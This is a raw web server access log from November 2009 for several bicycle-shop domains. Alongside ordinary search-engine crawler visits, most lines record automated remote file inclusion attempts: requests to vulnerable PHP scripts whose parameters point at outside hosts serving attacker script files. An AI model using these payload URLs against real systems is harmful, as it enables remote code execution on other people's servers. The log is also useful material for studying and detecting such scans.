77.221.130.17 - - [12/Nov/2009:03:06:55 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:06:55 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.115.6.17 - - [12/Nov/2009:04:03:07 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:04:23:13 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:04:23:13 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:04:23:13 -0800] "GET /logs/access.log%20%20////skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:04:24:26 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:04:24:26 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:04:24:26 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.110.176 - - [12/Nov/2009:04:32:33 -0800] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
124.138.172.3 - - [12/Nov/2009:04:38:41 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:04:38:41 -0800] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
119.63.198.10 - - [12/Nov/2009:04:39:00 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.svbikes.com"
124.0.143.66 - - [12/Nov/2009:04:40:23 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:40:23 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:40:23 -0800] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:40:25 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:40:25 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:40:26 -0800] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:04:42:44 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:04:42:44 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:04:42:44 -0800] "GET /logs/access.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:43:57 -0800] "GET /logs/access.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:43:57 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:43:57 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:44:02 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:44:02 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:44:31 -0800] "GET /logs/access.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:04:45:48 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:04:45:48 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:04:45:50 -0800] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:46:40 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:46:40 -0800] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:46:40 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:46:48 -0800] "GET /logs/access.log//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:46:48 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:04:46:49 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.114 - - [12/Nov/2009:04:47:46 -0800] "GET /tmp/?D=A HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
93.190.48.203 - - [12/Nov/2009:04:48:21 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.48.203 - - [12/Nov/2009:04:48:21 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.48.203 - - [12/Nov/2009:04:48:23 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.48.203 - - [12/Nov/2009:04:48:23 -0800] "GET /logs//skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.190.48.203 - - [12/Nov/2009:04:48:23 -0800] "GET /skin/ggambo7002_board/setup.php?dir=http://dwheater.com/bbs/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:04:49:11 -0800] "GET /skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:04:49:11 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:04:49:11 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.86.49.6 - - [12/Nov/2009:04:51:03 -0800] "GET /skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.86.49.6 - - [12/Nov/2009:04:51:03 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
115.86.49.6 - - [12/Nov/2009:04:51:04 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.85 - - [12/Nov/2009:04:52:47 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.112.85 - - [12/Nov/2009:04:52:49 -0800] "GET /bullitinboard/viewtopic.php?p=4186 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
89.78.157.243 - - [12/Nov/2009:04:55:38 -0800] "GET /logs/scripts.log HTTP/1.1" 200 55735 "-" "Mozilla/3.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.svbikes.com"
200.29.90.110 - - [12/Nov/2009:04:59:05 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.29.90.110 - - [12/Nov/2009:04:59:05 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.29.90.110 - - [12/Nov/2009:04:59:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
200.29.90.110 - - [12/Nov/2009:04:59:32 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.111.181 - - [12/Nov/2009:05:01:00 -0800] "GET /logs/?S=A HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
67.195.115.254 - - [12/Nov/2009:05:02:44 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
67.195.115.254 - - [12/Nov/2009:05:02:51 -0800] "GET /logs/access_090710.log HTTP/1.0" 200 4066757 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "svbikes.com"
67.195.111.181 - - [12/Nov/2009:05:10:37 -0800] "GET /logs/access_090510.log HTTP/1.0" 200 1507328 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
87.250.230.32 - - [12/Nov/2009:05:25:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "bicyclestoreshouston.com"
65.55.106.110 - - [12/Nov/2009:05:27:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
77.221.130.17 - - [12/Nov/2009:05:30:15 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:30:27 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:30:28 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:30:28 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:31:21 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:31:21 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:31:22 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:33:02 -0800] "GET /appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:33:02 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:33:03 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:33:28 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:33:28 -0800] "GET /appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:33:28 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:33:49 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:33:49 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:33:49 -0800] "GET /appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:33:56 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:33:56 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:34:33 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:05:34:34 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:36:30 -0800] "GET /appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:36:30 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:36:30 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.249.65.152 - - [12/Nov/2009:05:37:22 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.svbikes.com"
66.249.65.152 - - [12/Nov/2009:05:37:22 -0800] "GET /Rides.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.svbikes.com"
213.79.101.98 - - [12/Nov/2009:05:39:29 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:39:29 -0800] "GET /appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:39:29 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:39:50 -0800] "GET /appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:39:50 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:39:55 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:40:17 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:40:17 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
213.79.101.98 - - [12/Nov/2009:05:40:17 -0800] "GET /appserv/main.php?appserv_root=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:05:53:04 -0800] "GET /logs/access.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:05:53:04 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:05:53:04 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.114 - - [12/Nov/2009:05:54:06 -0800] "GET /bullitinboard/viewtopic.php?p=15826 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
65.55.106.110 - - [12/Nov/2009:05:57:28 -0800] "GET / HTTP/1.1" 200 1764 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
93.174.0.17 - - [12/Nov/2009:05:58:48 -0800] "GET /logs/access.log//modules/vWar_Account/includes/get_header.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [12/Nov/2009:05:58:48 -0800] "GET /logs//modules/vWar_Account/includes/get_header.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [12/Nov/2009:05:58:48 -0800] "GET /modules/vWar_Account/includes/get_header.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.213.177.58 - - [12/Nov/2009:05:59:23 -0800] "GET /?reflect_base=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.805" "houstonbikeshop.com"
74.213.177.58 - - [12/Nov/2009:05:59:23 -0800] "GET /logs/?reflect_base=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "houstonbikeshop.com"
74.213.177.58 - - [12/Nov/2009:05:59:27 -0800] "GET /logs/access.log/?reflect_base=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
74.213.177.58 - - [12/Nov/2009:05:59:35 -0800] "GET /?reflect_base=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 200 1764 "-" "libwww-perl/5.805" "houstonbikeshop.com"
74.213.177.58 - - [12/Nov/2009:05:59:35 -0800] "GET /logs/?reflect_base=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "houstonbikeshop.com"
74.213.177.58 - - [12/Nov/2009:05:59:35 -0800] "GET /logs/access.log/?reflect_base=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
219.166.240.66 - - [12/Nov/2009:06:01:27 -0800] "GET /?reflect_base=http://204.3.167.134/mpc/docs/styles/.www.www.www/.albania.albania.albania/echo?????????????????????????????????????????????????????????????????????????????????????????????????&mode=id HTTP/1.1" 200 1764 "-" "-" "houstonbikeshop.com"
93.174.0.17 - - [12/Nov/2009:06:03:46 -0800] "GET /modules/vWar_Account/includes/get_header.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [12/Nov/2009:06:03:46 -0800] "GET /logs/access.log%20%20//modules/vWar_Account/includes/get_header.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
93.174.0.17 - - [12/Nov/2009:06:03:46 -0800] "GET /logs//modules/vWar_Account/includes/get_header.php?vwar_root=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
66.235.124.56 - - [12/Nov/2009:06:14:56 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "bicyclestoreshouston.com"
66.235.124.56 - - [12/Nov/2009:06:14:56 -0800] "GET /translations/Spanish.txt HTTP/1.0" 200 28587 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "bicyclestoreshouston.com"
64.251.28.214 - - [12/Nov/2009:06:16:08 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:06:16:09 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
64.251.28.214 - - [12/Nov/2009:06:16:10 -0800] "GET /logs/access.log///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.39.159 - - [12/Nov/2009:06:23:57 -0800] "GET /logs/access.log//ask_password.php?%20dir=http://oktober.fileave.com/read.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
